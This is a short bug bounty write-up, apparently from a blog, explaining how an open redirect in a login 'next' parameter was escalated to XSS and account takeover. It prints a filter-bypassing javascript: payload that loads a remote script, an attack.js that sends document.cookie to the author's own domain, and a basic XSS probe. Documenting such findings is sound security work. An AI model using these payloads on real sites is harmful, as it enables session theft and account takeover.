Open in app

Sign in

Write

Sign in

Open-redirect to Account Takeover.

Rishabh
2 min readMay 19, 2019

--

We will lead to here later.

Hi everyone this is my first writeup about my first bug and I want to share how I escalated open redirect to Account Takeover. Let’s go

https://victim.com/login/?next=/page/

This was the URL which redirects to the given page after login but the issue was that if I pass https://google.com to next parameter it will redirect to google.com which is external.

After reading more than 15 reports about the open redirect, I came to know what you can do with this vulnerability is redirect the user to your domain and then prompt for sensitive information for which the manipulated URL will look something like this

https://victim.com/login/?next=https://your_domain.com

But I did not report it that way instead I thought why not to try something else like different scheme (javascript:) and luckily there were no filters for that so now the vulnerability escalated from phishing attack to XSS after that I just made a nice POC stealing cookies of the current user who opens the manipulated URL.

Problems I faced during making POC.

  1. Double quotes, single quote, and Parentheses were not allowed.[I used the backtick(`)]
  2. For stealing cookies you need to make a request to your server with cookies but we can’t use fetch or XMLHttpRequest because both require Parentheses.[After one day of searching I came to know that the website uses jquery so I added my own javascript to their domain which basically allowed me to do anything] —

?next= javascript:$.getScript`https://my_own_domain/attack.js`

Attack.js

if(location.host == “my_own_domain”){ 
    Url = new URL(document.location); 
    Parameters = new URLSearchParams(x.search); 
    cookie = Parameters.get(“cookie”); 
    document.write(cookie);
}
else{ 
    var cookie = document.cookie; 
document.location=“https://my_own_domain/attacker.html?cookie="+cookie;
}

TakeAways

  1. Always try the different thing I even tried for XSS (?next=<script>alert(1)</script>) sometimes it works out sometimes it does not but in both cases, you gain the experience and familiarity to the concept.
  2. It may take you time to find your first bug but the experience is worth it.

Final Payload

https://victim.com/?next= javascript:$.getScript`https://my_own_domain/attack.js`

My twitter ==> ME

Thanks a lot for reading. Until next time

Bug Bounty
Vulnerability
Pentesting
Writeup
Hackerone

--

--

Rishabh

Written by Rishabh

200 Followers

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams